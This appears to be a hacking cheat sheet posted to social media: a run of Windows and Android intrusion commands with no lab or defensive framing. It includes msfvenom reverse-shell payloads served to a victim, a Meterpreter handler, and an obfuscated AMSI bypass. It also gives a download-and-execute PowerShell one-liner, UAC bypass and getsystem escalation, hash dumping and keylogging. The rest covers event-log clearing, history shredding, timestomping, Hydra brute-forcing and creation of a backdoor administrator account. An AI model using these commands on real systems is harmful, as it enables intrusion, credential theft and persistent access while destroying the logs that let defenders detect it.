msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=[IP Address of Host Machine] LPORT=[Port in the Host Machine] -o [Output Path/shellcode.exe]msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[IP Address of Host Machine] -f exe > Desktop/Backdoor.exe
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp [PATH]/shellcode.exe /var/www/html/share
service apache2 start
Download it to the victim machine [IP Address of Host Machine]/share/shellcode.exe
.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP Address of Host Machine]
set LPORT [Port in the Host Machine]
exploit
upload [PATH]/PowerUp.ps1 PowerUp.ps1
Check all vulnerabilities
shell
poweshell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks
bypass
is used to bypass PowerShell’s execution policy.
For disable AMSI:
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Excute PowerUp.ps1 without upload the script
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/PowerUp/master/PowerUp.ps1'); Invoke-AllChecks"
Escalate privileges
Invoke-ServiceAbuse -Name 'Name of the vulnerable service'
use exploit/windows/local/bypassuac_fodhelper
If it works, in some cases we can already escalate privileges with some techniques like getsystem
.
getsystem -t 1
run post/windows/gather/smart_hashdump
It uses the service Named Pipe Impersonation (In Memory/Admin) Technique.
clearev
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo All Event Logs have been cleared!
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo Current user permissions to execute this .BAT file are inadequate.
echo This .BAT file must be run with administrative privileges.
echo Exit now, right click on this .BAT file, and select "Run as administrator".
pause >nul
:theEnd
Exit
cipher /w:[Drive or Folder or File Location]
export HISTSIZE=0
shred ~/.bash_historyshred ~/.bash_history && cat /dev/null > .bash_history
timestomp [FILE] -v
timestomp [FILE] -m "mm/dd/yyyy hh:mm:ss"
keyscan_start
keyscan_dump
hydra -L [USERNAMES DICTIONARY] -P [PASSWORDS DICTIONARY] ftp://[IP]
net user Test /Add
net localgroup Administrators Test /Add
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=[LOCAL HOST] R > payload.apk
Source: https://github.com
#security #hacking